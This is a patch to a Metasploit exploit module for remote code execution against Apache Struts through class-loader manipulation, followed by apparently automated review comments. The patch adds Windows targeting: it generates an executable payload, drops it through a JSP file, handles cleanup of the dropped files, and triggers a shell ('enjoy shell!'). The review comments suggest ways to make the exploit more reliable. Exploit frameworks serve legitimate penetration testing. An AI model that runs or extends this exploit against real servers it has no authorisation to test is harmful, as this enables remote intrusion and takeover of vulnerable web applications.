From 373eb3dda045fa045c0fa3ccafed62dffccb98fb Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Wed, 10 Sep 2014 18:00:16 -0500
Subject: [PATCH] Make struts_code_exec_classloader to work on windows
---
 .../http/struts_code_exec_classloader.rb | 33 +++++++++++++++----
 1 file changed, 27 insertions(+), 6 deletions(-)
diff --git a/modules/exploits/multi/http/struts_code_exec_classloader.rb b/modules/exploits/multi/http/struts_code_exec_classloader.rb
index 344061f9e5..68c3eee133 100644
--- a/modules/exploits/multi/http/struts_code_exec_classloader.rb
+++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb
@@ -150,6 +150,8 @@ class Metasploit3 < Msf::Exploit::Remote
 output << l
 elsif l =~ /<%/
 next
+ elsif l=~ /%>/
+ next
 elsif l.chomp.empty?
 next
 else
@@ -163,10 +165,18 @@ class Metasploit3 < Msf::Exploit::Remote
 if target['Arch'] == ARCH_JAVA
 jsp = fix(payload.encoded)
 else
- payload_exe = generate_payload_exe
+ if target['Platform'] == 'win'
+ payload_exe = Msf::Util::EXE.to_executable_fmt(framework, target.arch, target.platform, payload.encoded, "exe-small", {:arch => target.arch, :platform => target.platform})
+ else
+ payload_exe = generate_payload_exe
+ end
 payload_file = rand_text_alphanumeric(4 + rand(4))
 jsp = jsp_dropper(payload_file, payload_exe)
- register_files_for_cleanup(payload_file)
+ if target['Platform'] == 'win' && target['Arch'] == ARCH_X86
+ register_files_for_cleanup("../webapps/ROOT/#{payload_file}")
+ else
+ register_files_for_cleanup(payload_file)
+ end
 end
 jsp
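Review bot: The new `elsif l=~ /%>/` branch in the JSP-fixing loop is formatted differently from the `l =~ /<%/` branch directly above it; write it as `elsif l =~ /%>/` so the two delimiter checks read the same. Both branches discard the whole line whenever the delimiter appears anywhere in it, so a payload line that carries code on the same line as `%>` would be dropped rather than trimmed — if the generated JSP can place code and delimiter on one line, the branch should strip the delimiter instead of skipping the line, which cannot be confirmed from this hunk alone. The enclosing loop and method start and end outside the hunk.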
@@ -193,12 +203,16 @@ class Metasploit3 < Msf::Exploit::Remote
 # Check if the log file exists and has been flushed
- if check_log_file(normalize_uri(target_uri.to_s))
- register_files_for_cleanup(@jsp_file)
- else
+ unless check_log_file(normalize_uri(target_uri.to_s))
 fail_with(Failure::Unknown, "#{peer} - The log file hasn't been flushed")
 end
+ if target['Platform'] == 'win' && target['Arch'] == ARCH_X86
+ register_files_for_cleanup("../webapps/ROOT/#{@jsp_file}")
+ else
+ register_files_for_cleanup(@jsp_file)
+ end
+
 # Prepare the JSP
 print_status("#{peer} - Generating JSP...")
 jsp = create_jsp
@@ -213,7 +227,9 @@ class Metasploit3 < Msf::Exploit::Remote
 end
 # Check log file... enjoy shell!
- check_log_file(random_request)
+ unless target['Arch'] == ARCH_JAVA
+ check_log_file(random_request)
+ end
 # No matter what happened, try to 'restore' the Class Loader
 properties = {
@@ -223,6 +239,11 @@ class Metasploit3 < Msf::Exploit::Remote
 :file_date_format => ''
 }
 modify_class_loader(properties)
+
+ if target['Arch'] == ARCH_JAVA
+ send_request_cgi({ 'uri' => normalize_uri("/", @jsp_file) })
+ end
+
 end
 end
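Review bot: The cleanup path `"../webapps/ROOT/#{@jsp_file}"` registered here hard-codes a Tomcat layout (a `ROOT` context with a working directory one level below `webapps/`) and is gated on `target['Platform'] == 'win' && target['Arch'] == ARCH_X86`, even though the Windows working-directory assumption it encodes would presumably apply to the other Windows target as well; the same gated prefix is duplicated for `payload_file` in `create_jsp` in the previous hunk. If the registered path does not match where the file really lands, cleanup silently leaves the dropped file on the target, so both sites should go through one helper that states the assumption once, with this line becoming `register_files_for_cleanup(cleanup_path(@jsp_file))` and the `create_jsp` site `register_files_for_cleanup(cleanup_path(payload_file))`. The `unless ... fail_with` rewrite above is fine as written. `exploit` starts and ends outside this hunk.
```ruby
  # Path that register_files_for_cleanup needs for a file dropped into the
  # ROOT webapp. On the Windows x86 target the service's working directory is
  # assumed to sit one level below webapps/, so the relative prefix is needed
  # there; other targets see the file under its bare name.
  # TODO confirm whether the same prefix is needed for the other Windows target.
  def cleanup_path(file)
    if target['Platform'] == 'win' && target['Arch'] == ARCH_X86
      "../webapps/ROOT/#{file}"
    else
      file
    end
  end
```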
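Review bot: The comment `# Check log file... enjoy shell!` now sits above a branch that skips the check for `ARCH_JAVA` targets without saying why, and a three-line `unless ... end` around a single call reads better as a modifier: `check_log_file(random_request) unless target['Arch'] == ARCH_JAVA`. Since the Java path is instead triggered by requesting the JSP after the class loader is restored (the last hunk), a short comment such as `# Java targets are triggered by requesting the JSP once the class loader is restored` would keep the two paths from looking inconsistent to the next reader. `exploit` starts outside this hunk.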
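Review bot: The `send_request_cgi` call added for `ARCH_JAVA` targets discards its response, so a `nil` return on timeout or a non-success status gives the operator no feedback and `exploit` ends as if the JSP had been served. Capture the result and report the failure case, e.g. `res = send_request_cgi('uri' => normalize_uri("/", @jsp_file))` followed by `print_warning("#{peer} - No response when requesting the JSP") if res.nil?`. The request also uses a bare `"/"` rather than `target_uri`, unlike the `normalize_uri(target_uri.to_s)` used for the log-file check in the first hunk; if the JSP is always served from the ROOT context that is intended and deserves a one-line comment saying so.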